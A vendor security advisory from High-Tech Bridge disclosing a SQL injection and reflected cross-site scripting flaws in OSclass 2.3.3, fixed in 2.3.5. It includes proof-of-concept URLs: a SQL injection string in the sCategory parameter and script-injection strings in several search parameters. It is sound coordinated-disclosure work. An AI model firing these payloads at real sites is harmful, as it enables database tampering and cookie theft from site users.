High-Tech Bridge Security Advisories are CVE Compatible    High-Tech Bridge Security Advisories CWE Compatibility    High-Tech Bridge Security Advisories CVSS Adopters
Vendor Statistics

286 software vendors have fixed 926 vulnerabilities in their products thanks to High-Tech Bridge Security Research Lab.

Patch Available Upon Disclosure

2014 Q1: 87%2013 Q2: 92%
2013 Q4: 67%2013 Q1: 100%
2013 Q3: 77%2012 Q4: 68%

Vendor Average Time to Patch

2014 Q1: 5 days 2013 Q2: 30 days
2013 Q4: 8 days 2013 Q1: 13 days
2013 Q3: 13 days 2012 Q4: 26 days

High-Tech Bridge Newsletter

Subscribe to our newsletter and receive some or all of our corporate news, invitations to security events or HTB Security Advisories – you choose what you want to receive.

Multiple vulnerabilities in OSclass

Advisory ID:HTB23068
Product:OSclass
Vendor: Osclass
Vulnerable Versions:2.3.3 and probably prior
Tested Version:2.3.3
Advisory Publication:January 4, 2012 [without technical details]
Vendor Notification:January 4, 2012
Vendor Fix:January 16, 2012
Public Disclosure:January 25, 2012
Latest Update:February 2, 2012
Vulnerability Type:SQL Injection [CWE-89]
Cross-Site Scripting [CWE-79]
CVE References:CVE-2012-0973
CVE-2012-0974
Risk Level:High
CVSSv2 Base Scores:7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OSclass, which can be exploited to perform cross-site scripting and sql injection attacks.


1) SQL Injection in OSclass: CVE-2012-0973.

Input passed via the "sCategory" GET parameter to /index.php is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1%29%2 9=5%29%20d%20--%202

Successful exploitation of the vulnerability requires that "magic_quotes_gpc" is off.


2) Cross-Site Scripting in OSclass: CVE-2012-0974.

Input passed via the "sCity", "sPattern", "sPriceMax", "sPriceMin" GET parameters to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
http://[host]/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E
http://[host]/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E


Solution:
Upgrade to OSClass 2.3.5

More information:
http://osclass.org/2012/01/16/osclass-2-3-5/


ImmuniWeb® by High-Tech Bridge


References:
[1] High-Tech Bridge Advisory HTB23068 - https://www.htbridge.com/advisory/HTB23068 - Multiple vulnerabilities in OSclass.
[2] OSclass - http://osclass.org/ - OSClass is an open source project for classifieds.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.